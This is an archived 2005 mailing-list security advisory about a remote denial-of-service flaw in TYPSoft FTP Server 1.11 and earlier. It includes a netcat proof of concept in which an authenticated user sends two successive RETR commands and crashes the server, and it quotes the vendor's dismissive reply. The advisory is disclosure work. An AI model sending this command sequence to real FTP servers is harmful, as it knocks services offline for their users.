lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <BAY19-DAV45B8B356CBC19A1404A60D97A0@phx.gbl>
Date: Thu Oct 13 21:15:35 2005
From: se_cur_ity at hotmail.com (Morning Wood)
Subject: TYPSoft ftpd

EXPL-A-2005-016 exploitlabs.com Advisory 045





AFFECTED PRODUCTS

TYPSoft FTP Server v1.11 and earlier
http://www.typsoft.com/



OVERVIEW

TYPSoft FTP Server is a fast and easy ftp server
 with support to Standard FTP Command,
 Clean interface, Virtual File System architecture,
 ability to resume Download and Upload, IP Restriction,
 Login/Quit message, logs, Multi Language
 and many other things.



DETAILS

1. DOS
Typsoft ftp server does not properly support the
 RETR command. When "Sub Directory Include" is checked
 in the user config. This is exploitable by authenticated
 users to TYPSoft ftpd.



POC
1. by requesting 2 RETR [string] commands in succession

C:\>nc -v 192.168.0.2 21
ftpserv [192.168.0.2] 21 (ftp) open
220 TYPSoft FTP Server 1.11 ready...
USER ok
331 Password required for ok.
PASS ok
230 User ok logged in.
RETR 0
150 Opening data connection for 0.
RETR 0
150 Opening data connection for 0.
[ crash here ]
C:\>

Exception ESocketException in module ftpserv.exe at 000862A6
"no port specified"

note: string length has no effect and
       does not appear exploitable.




SOLUTION:
vendor contact:
Oct 10, 2005 webmaster@...soft.com

response:
---------
Well i dont see any security problem except that TFS will raise an error
because the socket was not open on the second RETR

It's more a bug that a security problem except if you show me the opposite.

Marc
TYPSoft


reply:
------
see attatched perl POC
http://www.exploitlabs.com/files/advisories/typsoft-poc.zip

it demonstrates a full crash ( program exit ) from remote.
note: a remote DOS[crash] is classified as a security issue, even if it does
not
lead to compromise, due to the fact that a remote user ( not
administrative )
can disable[crash] a (needed) service.


response:
---------
[none]




CREDITS

This vulnerability was discovered and researched by
Donnie Werner of exploitlabs


mail:   wood at exploitlabs.com
mail:   morning_wood at zone-h.org
-- 
web: http://exploitlabs.com
web: http://zone-h.org

http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txt

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ